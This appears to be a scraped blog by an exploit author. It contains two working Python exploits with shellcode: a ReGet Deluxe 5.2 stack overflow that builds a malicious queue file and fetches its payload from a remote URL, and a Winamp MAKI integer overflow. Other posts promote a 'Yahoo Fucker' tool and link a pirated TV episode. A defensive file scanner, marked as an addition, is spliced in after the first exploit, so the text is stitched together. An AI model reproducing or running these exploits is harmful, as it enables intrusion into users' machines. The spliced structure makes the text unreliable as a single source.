ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit
hello
today i’ve discovered a pretty overflow in Reget download manager
i’ve spent the whole day trying to find out how to exploit it, and finally got it
the bug is caused when parsing long characters in the destination path for the downloaded file. the challenge is that you can’t put any kind of shellcode coz of restricted characters, even with the alpha encoding. also the address is a 2nd problem too.
so it’s maybe impossible to exploit it that way.
i noticed that when i tried to put ‘google.com’ into the download part, for example, the edi register points to a location in memory where the contents of the web page are saved. so i thought this would be the key :d
the other problem i’ve faced is that when i try to open a page from my localhost the edi would be “000000”. i didn’t know where the problem was
until i put a large file and pointed to it and PINGO the edi points again.
ok now all i need is to create my payload and execute the edi. but wait a minute…. what about the address??? where will i put the jmp??
in the first place the app won’t crash if i put a random address. i mean a regular address like any jmp address. but i need an address that would not corrupt my buffer string. so i found one in user32.dll (xp sp3), put it all together and BANG… calc pops up
ok here is the exploit code:
import sys
print ""
print " ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit"
print " By: Encrypt3d.M!nd "
print " http://m1nd3d.wordpress.com/ "
print " For Details visit my blog "
print ""
try:
header = (
"\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F"
"\x64\x69\x6E\x67\x3D\x22\x55\x54\x46\x2D\x38\x22\x20\x3F\x3E\x0D\x0A\x3C\x21\x2D\x2D\x20\x47\x65"
"\x6E\x65\x72\x61\x74\x65\x64\x20\x62\x79\x20\x52\x65\x47\x65\x74\x20\x44\x65\x6C\x75\x78\x65\x20"
"\x35\x2E\x32\x20\x28\x62\x75\x69\x6C\x64\x20\x33\x33\x30\x29\x20\x2D\x2D\x3E\x0D\x0A\x3C\x52\x65"
"\x47\x65\x74\x4A\x72\x0D\x0A\x09\x4C\x61\x73\x74\x49\x64\x3D\x22\x31\x22\x0D\x0A\x09\x50\x72\x65"
"\x64\x65\x66\x69\x6E\x65\x64\x43\x61\x74\x65\x67\x6F\x72\x69\x65\x73\x3D\x22\x31\x22\x0D\x0A\x09"
"\x54\x72\x61\x66\x66\x69\x63\x53\x75\x73\x70\x65\x6E\x64\x65\x64\x3D\x22\x31\x22\x0D\x0A\x09\x54"
"\x72\x61\x66\x66\x69\x63\x43\x6F\x6F\x70\x65\x72\x61\x74\x69\x76\x65\x3D\x22\x32\x22\x0D\x0A\x09"
"\x4D\x61\x78\x53\x65\x63\x74\x53\x75\x73\x70\x65\x6E\x64\x65\x64\x3D\x22\x31\x22\x0D\x0A\x09\x4D"
"\x61\x78\x53\x65\x63\x74\x43\x6F\x6F\x70\x65\x72\x61\x74\x69\x76\x65\x3D\x22\x31\x22\x0D\x0A\x09"
"\x4D\x61\x78\x53\x65\x63\x74\x55\x6E\x6C\x69\x6D\x69\x74\x65\x64\x3D\x22\x33\x22\x0D\x0A\x09\x53"
"\x61\x76\x65\x54\x6F\x3D\x22\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x20\x61\x6E\x64\x20"
"\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x75\x6E\x6B\x6E\x6F\x77\x6E\x5C\x4D\x79\x20\x44\x6F\x63\x75"
"\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x22\x0D\x0A\x09\x4D\x61"
"\x78\x45\x72\x72\x6F\x72\x43\x6F\x75\x6E\x74\x3D\x22\x31\x30\x30\x22\x0D\x0A\x09\x54\x72\x79\x50"
"\x61\x75\x73\x65\x3D\x22\x35\x22\x0D\x0A\x09\x54\x69\x6D\x65\x4F\x75\x74\x3D\x22\x39\x30\x22\x0D"
"\x0A\x09\x4D\x69\x6E\x53\x65\x63\x74\x69\x6F\x6E\x53\x69\x7A\x65\x3D\x22\x31\x30\x30\x30\x30\x22"
"\x0D\x0A\x09\x41\x75\x74\x6F\x53\x61\x76\x65\x52\x65\x73\x75\x6C\x74\x46\x69\x6C\x65\x3D\x22\x43"
"\x3A\x5C\x50\x72\x6F\x67\x72\x61\x6D\x20\x46\x69\x6C\x65\x73\x5C\x52\x65\x47\x65\x74\x20\x53\x6F"
"\x66\x74\x77\x61\x72\x65\x5C\x52\x65\x47\x65\x74\x20\x44\x65\x6C\x75\x78\x65\x5C\x73\x65\x61\x72"
"\x63\x68\x2E\x78\x6D\x6C\x22\x0D\x0A\x09\x3E\x0D\x0A\x09\x3C\x51\x75\x65\x75\x65\x3E\x0D\x0A\x09"
"\x09\x3C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x0D\x0A\x09\x09\x09\x49\x64\x3D\x22\x31\x22\x0D\x0A\x09"
"\x09\x09\x46\x69\x6C\x65\x4E\x61\x6D\x65\x3D\x22\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73"
"\x20\x61\x6E\x64\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x75\x6E\x6B\x6E\x6F\x77\x6E\x5C\x4D\x79"
"\x20\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x5C"
"\x61\x2E\x65\x78\x65\x22\x0D\x0A\x09\x09\x09\x53\x74\x61\x74\x65\x3D\x22\x33\x22\x0D\x0A\x09\x09"
"\x09\x44\x6F\x6E\x74\x55\x73\x65\x43\x61\x74\x65\x67\x6F\x72\x79\x53\x6F\x72\x74\x69\x6E\x67\x3D"
"\x22\x30\x22\x0D\x0A\x09\x09\x09\x53\x74\x61\x72\x74\x44\x6C\x54\x69\x6D\x65\x3D\x22\x30\x22\x0D"
"\x0A\x09\x09\x09\x43\x72\x65\x61\x74\x69\x6F\x6E\x54\x69\x6D\x65\x3D\x22\x32\x35\x2E\x31\x32\x2E"
"\x32\x30\x30\x39\x20\x31\x34\x3A\x35\x38\x3A\x30\x32\x22\x0D\x0A\x09\x09\x09\x4C\x61\x73\x74\x53"
"\x74\x61\x72\x74\x54\x69\x6D\x65\x3D\x22\x30\x22\x0D\x0A\x09\x09\x09\x55\x72\x6C\x3D\x22\x68\x74"
"\x74\x70\x3A\x2F\x2F"+sys.argv[1]+"\x22\x0D\x0A\x09"
"\x09\x09\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x43\x61\x74\x65\x67\x6F\x72\x79\x3D\x22\x2D\x31\x22\x0D"
"\x0A\x09\x09\x09\x53\x61\x76\x65\x54\x6F\x3D\x22")
buff = "\x41" * 268
buff+= "\x5F\x4D\x48\x7E" # call edi - winxp sp3 (friendly chars)
buff+= "\x41" * 1000
foot = (
"\x22\x0D\x0A\x09\x09\x09\x41\x75\x74\x6F\x53\x74\x61\x72\x74\x43\x72\x65\x61\x74\x65\x3D\x22\x31"
"\x22\x0D\x0A\x09\x09\x20\x2F\x3E\x0D\x0A\x09\x3C\x2F\x51\x75\x65\x75\x65\x3E\x0D\x0A\x3C\x2F\x52"
"\x65\x47\x65\x74\x4A\x72\x3E\x0D\x0A")
evil = "\x90" * 100
evil+= (
"\x89\xe6\xd9\xc7\xd9\x76\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4a\x48\x4c\x49\x43\x30\x43\x30\x45\x50\x45\x30\x4b\x39"
"\x4a\x45\x46\x51\x4e\x32\x51\x74\x4c\x4b\x46\x32\x44\x70\x4c"
"\x4b\x42\x72\x44\x4c\x4e\x6b\x43\x62\x42\x34\x4e\x6b\x51\x62"
"\x47\x58\x44\x4f\x48\x37\x51\x5a\x45\x76\x46\x51\x49\x6f\x45"
"\x61\x4f\x30\x4e\x4c\x47\x4c\x51\x71\x51\x6c\x45\x52\x46\x4c"
"\x47\x50\x4f\x31\x4a\x6f\x44\x4d\x45\x51\x4f\x37\x4d\x32\x48"
"\x70\x42\x72\x46\x37\x4c\x4b\x46\x32\x42\x30\x4e\x6b\x50\x42"
"\x45\x6c\x47\x71\x4e\x30\x4e\x6b\x51\x50\x51\x68\x4c\x45\x4f"
"\x30\x44\x34\x51\x5a\x46\x61\x48\x50\x42\x70\x4c\x4b\x50\x48"
"\x42\x38\x4c\x4b\x50\x58\x51\x30\x46\x61\x4e\x33\x4d\x33\x47"
"\x4c\x43\x79\x4c\x4b\x50\x34\x4c\x4b\x46\x61\x4a\x76\x46\x51"
"\x49\x6f\x44\x71\x49\x50\x4c\x6c\x4b\x71\x4a\x6f\x46\x6d\x47"
"\x71\x4f\x37\x46\x58\x4b\x50\x43\x45\x4a\x54\x43\x33\x43\x4d"
"\x4b\x48\x47\x4b\x43\x4d\x51\x34\x43\x45\x4b\x52\x42\x78\x4c"
"\x4b\x46\x38\x45\x74\x46\x61\x4a\x73\x45\x36\x4c\x4b\x46\x6c"
"\x50\x4b\x4e\x6b\x43\x68\x45\x4c\x46\x61\x4e\x33\x4c\x4b\x46"
"\x64\x4e\x6b\x43\x31\x4e\x30\x4e\x69\x51\x54\x46\x44\x51\x34"
"\x51\x4b\x51\x4b\x43\x51\x51\x49\x51\x4a\x50\x51\x49\x6f\x49"
"\x70\x51\x48\x51\x4f\x43\x6a\x4c\x4b\x42\x32\x4a\x4b\x4f\x76"
"\x43\x6d\x50\x6a\x47\x71\x4e\x6d\x4d\x55\x4e\x59\x47\x70\x43"
"\x30\x45\x50\x46\x30\x42\x48\x44\x71\x4e\x6b\x42\x4f\x4f\x77"
"\x4b\x4f\x4a\x75\x4d\x6b\x4d\x30\x45\x4d\x46\x4a\x44\x4a\x42"
"\x48\x49\x36\x4c\x55\x4d\x6d\x4d\x4d\x49\x6f\x4e\x35\x45\x6c"
"\x45\x56\x51\x6c\x44\x4a\x4b\x30\x4b\x4b\x4b\x50\x51\x65\x44"
"\x45\x4d\x6b\x50\x47\x44\x53\x42\x52\x50\x6f\x42\x4a\x43\x30"
"\x46\x33\x4b\x4f\x4a\x75\x42\x43\x50\x61\x50\x6c\x42\x43\x43"
"\x30\x41\x41")
evil+="\x41" * 70000
wjr_file=open('devil.wjr','w')
wjr_file.write(header+buff+foot)
wjr_file.close()
print "[+] 'devil.wjr' Created Successfully"
devil_file=open('shellcode','w')
devil_file.write(evil)
devil_file.close()
print "[+] 'shellcode' Created Successfully"
except:
print "###################################################"
print " Usage: exploit.py [payload] "
print " [payload] = url to shellcode without(http://) "
print " Example: "
print " exploit.py www.site.com/shellcode "
usage:
exploit.py [url]
this file will create two files:
devil.wjr = ReGet file
shellcode = payload file. you must upload it to a website.
for example if you upload it to www.site.com/shellcode
then the usage will be:
exploit.py www.site.com/shellcode
WITHOUT http://
finally
i wish this would be useful to some people
Merry Christmas everyone and happy new year
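A defensive check for the file format the generator above writes, added here as an example and not part of the original post: it reads a .wjr queue file and flags any SaveTo value longer than a normal Windows path, which is the field the overflow is triggered through. The 260-character limit (MAX_PATH), the function names and the sample file are assumptions; the element and attribute names are the ones in the post's header bytes.

```python
import re
import xml.etree.ElementTree as ET

MAX_PATH = 260  # Windows MAX_PATH, assumed here as the sane ceiling for a SaveTo path

# Fallback for files that are not well-formed XML: pull every SaveTo="..." value.
SAVE_TO_RE = re.compile(rb'SaveTo\s*=\s*"([^"]*)"')


def save_to_values(data):
    """Return every SaveTo attribute value found in a .wjr queue file (bytes)."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return [v.decode("latin-1") for v in SAVE_TO_RE.findall(data)]
    return [el.attrib["SaveTo"] for el in root.iter() if "SaveTo" in el.attrib]


def scan_wjr(data, limit=MAX_PATH):
    """Return (length, reason) for each SaveTo value that should not be loaded."""
    findings = []
    for value in save_to_values(data):
        if len(value) > limit:
            findings.append((len(value), "SaveTo longer than %d characters" % limit))
        elif any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
            findings.append((len(value), "SaveTo contains control characters"))
    return findings


def build_sample(save_to):
    """Constructed sample: a minimal queue file using the element names above."""
    return (
        '<?xml version="1.0" encoding="UTF-8" ?>\r\n'
        '<!-- Generated by ReGet Deluxe 5.2 (build 330) -->\r\n'
        '<ReGetJr LastId="1" SaveTo="C:\\Downloads">\r\n'
        '\t<Queue>\r\n'
        '\t\t<Download Id="1" Url="http://example.invalid/a.bin"'
        ' SaveTo="%s" AutoStartCreate="1" />\r\n'
        '\t</Queue>\r\n'
        '</ReGetJr>\r\n' % save_to
    ).encode("ascii")


if __name__ == "__main__":
    for path in ("C:\\Downloads", "A" * 300):  # constructed inputs, not the PoC
        print(len(path), scan_wjr(build_sample(path)) or "ok")
```

Running the scan on queue files before they are opened in the client (mail gateway, download folder watcher) catches the oversized field regardless of which return address or payload a file carries.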
Book: Overflow Exploitation
Peace be upon you
Praise be to God, today I finished a small book that explains the basics of exploiting the overflow vulnerabilities that occur in Windows applications.
Honestly, I tried as hard as I could to make the book simple and easy for beginners as a first step, and I cut out many important things and kept only the essentials.
I also found it hard to explain some terms in Arabic, so if anything in the book is unclear, please let me know and, God willing, I will explain it in detail.
To download the book:
http://www.mediafire.com/?mjmnz1jn5zm
Important note: copying, reproducing or using any material from the book without the author's personal permission is prohibited. Anyone who does otherwise will be held accountable.
Back to the old habit
hey i miss posting here but i’m a little bit busy these days coz of the study and other reasons…. whatever… yesterday i began a new stage to work on and the results of that were three exploits: 1 fresh and two that are just corrections for previously posted vulnerabilities. well, check them out on exploit-db.com:
http://www.exploit-db.com/exploits/10322
http://www.exploit-db.com/exploits/10321
http://www.exploit-db.com/exploits/10320
my best wishes for everyone…..
Yahoo Fucker 2.5 – another release
hello
i’d like to introduce the new version of Yahoo fucker
this edition contains some new features and fixes, and
a lot of changes.
you can download and read more in the readme.txt file which
is included with the program:
http://www.zshare.net/download/64981957526fc5ea/
or
http://www.ziddu.com/download/6312975/Yahoo_Fucker.rar.html
source:
http://mini-5pider.com/index.php/2009/09/01/yahoo-fucker-2-5-by-soso-h-h.html
IMPORTANT: I’ve seen an earlier version that is not my release, and it contains trojans and other kinds of viruses. so please DO NOT trust any download link unless it is from the Mini Spider Website or This Blog.
Hello…
hello
i know it’s been a while since my last post but
i’ve dedicated my time on the internet to something
different from what i usually do…
i just wanna try normal people’s life and maybe
i’ll be back into my thing..:)
so, be safe everyone
Winamp <= 5.551 Integer Overflow Exploit
Hello
i’ve just seen a poc for the maki exploit for winamp
http://milw0rm.com/exploits/8767
and thought to write an exploit for it:
i was in a hurry so i didn’t download the 5.551 version
and i just tested it on 5.51, but if it doesn’t work for you, just do some calculations.
the shellcode will execute windows calculator.
# Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
# By: Encrypt3d.M!nd
#
# Based on: http://milw0rm.com/exploits/8767
#
# place "mcvcore.maki" in "\Winamp\Skins\Bento\scripts" and run winamp
#
# NOTE: i've tested this on version 5.51; if it isn't workin' with your version,
# just edit the calculations of the chars
#
header = (
"\x46\x47\x03\x04\x17\x00\x00\x00\x2A\x00\x00\x00"
"\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5"
"\x32\x35\xF3\xE7\x64\x0F\xF5\xD6\xFA\x93\xB7\x49"
"\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9"
"\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC"
"\xB5\x3A\x02\xB2\x4D\x43\xA1\x4B\xBE\xAE\x59\x63"
"\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49"
"\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x36\x60\x38"
"\x1B\x46\xA7\x42\xAA\x75\xD8\x3F\x66\x67\xBF\x73"
"\xF4\x7A\x78\xF4\xBB\xB2\xF7\x4E\x9C\xFB\xE7\x4B"
"\xA9\xBE\xA8\x8D\x02\x0C\x37\x3A\xBF\x3C\x9F\x43"
"\x84\xF1\x86\x88\x5B\xCF\x1E\x36\xB6\x5B\x0C\x5D"
"\xE1\x7D\x1F\x4B\xA7\x0F\x8D\x16\x59\x94\x19\x41"
"\x99\xE1\xE3\x4E\x36\xC6\xEC\x4B\x97\xCD\x78\xBC"
"\x9C\x86\x28\xB0\xE5\x95\xBE\x45\x72\x20\x91\x41"
"\x93\x5C\xBB\x5F\xF9\xF1\x17\xFD\x4E\x6D\x90\x60"
"\x7E\x53\x2E\x48\xB0\x04\xCC\x94\x61\x88\x56\x72"
"\xC0\xBC\x3A\x40\x22\x6F\xD6\x4B\x8B\xA4\x10\xC8"
"\x29\x93\x25\x47\x4D\x3E\xAA\x97\xD0\xF4\xA8\x4F"
"\x81\x7B\x0D\x0A\xF2\x2A\x45\x49\x83\xFA\xBB\xE4"
"\x64\xF4\x81\xD9\x49\xB0\xC0\xA8\x5B\x2E\xC3\xBC"
"\xFD\x3F\x5E\xB6\x62\x5E\x37\x8D\x40\x8D\xEA\x76"
"\x81\x4A\xB9\x1B\x77\xBE\x97\x4F\xCE\xB0\x77\x19"
"\x4E\x99\x56\xD4\x98\x33\xC9\x6C\x27\x0D\x20\xC2"
"\xA8\xEB\x51\x2A\x4B\xBA\x7F\x5D\x4B\xC6\x5D\x4C"
"\x71\x38\xBA\x1E\x8D\x9E\x48\x3E\x48\xB9\x60\x8D"
"\x1F\x43\xC5\xC4\x05\x40\xC9\x08\x0F\x39\xAF\x23"
"\x4B\x80\xF3\xB8\xC4\x8F\x7E\xBB\x59\x72\x86\xAA"
"\xEF\x0E\x31\xFA\x41\xB7\xDC\x85\xA9\x52\x5B\xCB"
"\x4B\x44\x32\xFD\x7D\x51\x37\x7C\x4E\xBF\x40\x82"
"\xAE\x5F\x3A\xDC\x33\x15\xFA\xB9\x5A\x7D\x9A\x57"
"\x45\xAB\xC8\x65\x57\xA6\xC6\x7C\xA9\xCD\xDD\x8E"
"\x69\x1E\x8F\xEC\x4F\x9B\x12\xF9\x44\xF9\x09\xFF"
"\x45\x27\xCD\x64\x6B\x26\x5A\x4B\x4C\x8C\x59\xE6"
"\xA7\x0C\xF6\x49\x3A\xE4\x05\xCB\x6D\xC4\x8A\xC2"
"\x48\xB1\x93\x49\xF0\x91\x0E\xF5\x4A\xFF\xCF\xDC"
"\xB4\xFE\x81\xCC\x4B\x96\x1B\x72\x0F\xD5\xBE\x0F"
"\xFF\xE1\x8C\xE2\x01\x59\xB0\xD5\x11\x97\x9F\xE4"
"\xDE\x6F\x51\x76\x0D\x0A\xBD\xF8\xF0\x80\xA5\x1B"
"\xA6\x42\xA0\x93\x32\x36\xA0\x0C\x8D\x4A\x1B\x34"
"\x2E\x9B\x98\x6C\xFA\x40\x8B\x85\x0C\x1B\x6E\xE8"
"\x94\x05\x71\x9B\xD5\x36\xFD\x03\xF8\x4A\x97\x95"
"\x05\x02\xB7\xDB\x26\x7A\x10\xF2\xD5\x7F\xC4\xAC"
"\xDF\x48\xA6\xA0\x54\x51\x57\x6C\xDC\x76\x35\xA5"
"\xBA\xB5\xB3\x05\xCB\x4D\xAD\xC1\xE6\x18\xD2\x8F"
"\x68\x96\xC1\xFE\x29\x61\xB7\xDA\x51\x4D\x91\x65"
"\x01\xCA\x0C\x1B\x70\xDB\xF7\x14\x95\xD5\x36\xED"
"\xE8\x45\x98\x0F\x3F\x4E\xA0\x52\x2C\xD9\x82\x4B"
"\x3B\x9B\x7A\x66\x0E\x42\x8F\xFC\x79\x41\x15\x80"
"\x9C\x02\x99\x31\xED\xC7\x19\x53\x98\x47\x98\x63"
"\x60\xB1\x5A\x29\x8C\xAA\x4D\xC1\xBB\xE2\xF6\x84"
"\x73\x41\xBD\xB3\xB2\xEB\x2F\x66\x55\x50\x94\x05"
"\xC0\x73\x1F\x96\x1B\x40\x9B\x1B\x67\x24\x27\xAC"
"\x41\x65\x22\xBA\x3D\x59\x77\xD0\x76\x49\xB9\x52"
"\xF4\x71\x36\x55\x40\x0B\x82\x02\x03\xD4\xAB\x3A"
"\x87\x4D\x87\x8D\x12\x32\x6F\xAD\xFC\xD5\x83\xC2"
"\xDE\x24\x6E\xB7\x36\x4A\x8C\xCC\x9E\x24\xC4\x6B"
"\x6C\x73\x37\x00")
ex = (
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF")
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d"
"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c"
"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45"
"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36"
"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e"
"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a"
"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d"
"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74"
"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57"
"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38"
"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b"
"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77"
"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b"
"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53"
"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f"
"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31"
"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50"
"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37"
"\x70\x41")
chars = "A" * 301
chars2= "B" * 16100
file=open('mcvcore.maki','w')
file.write(header+ex+chars+"\xeb\x12\x41\x41"+"\x11\x10\xf0\x14"+"\x90"*20+shellcode+chars2)
file.close()
The Last Chapter….
i’m strongly sad to announce that but i have to…
i am gonna disconnect for a long while,,and i mean it this time coz
i have a lot of things i got to fix…
i hope that this spot helped and will help somebody in the things he was looking for…
with all my love
SaddaM
What Happened?!!…
i don’t know what has been changed
a while ago, about 2 years ago, i got the passion to read and learn
a lot of stuff..
Prison Break S04-E17 99 mb
hello
like i’ve published earlier some of the pb episodes
i’d like to share the 17th episode of the 4th season
and of course it’s a direct link and less than 100mb
so enjoy!
http://miamitropicslive.com/images/videos/.mov/(HaLinh.Vn)_Prison.Break.S04E17.REPACK.HDTV.XviD-0TV.rar
i’m still downloading it (2%)
…so i didn’t see the episode or check the file. so IT’S AT YOUR OWN RISK.
regards
Psycho thoughts..
hello
well, there are some things that make no sense to me and to a lot of people
but they’re used a lot in the wild.
like the love and the heart thing, everybody says that love is something
in the heart, but why?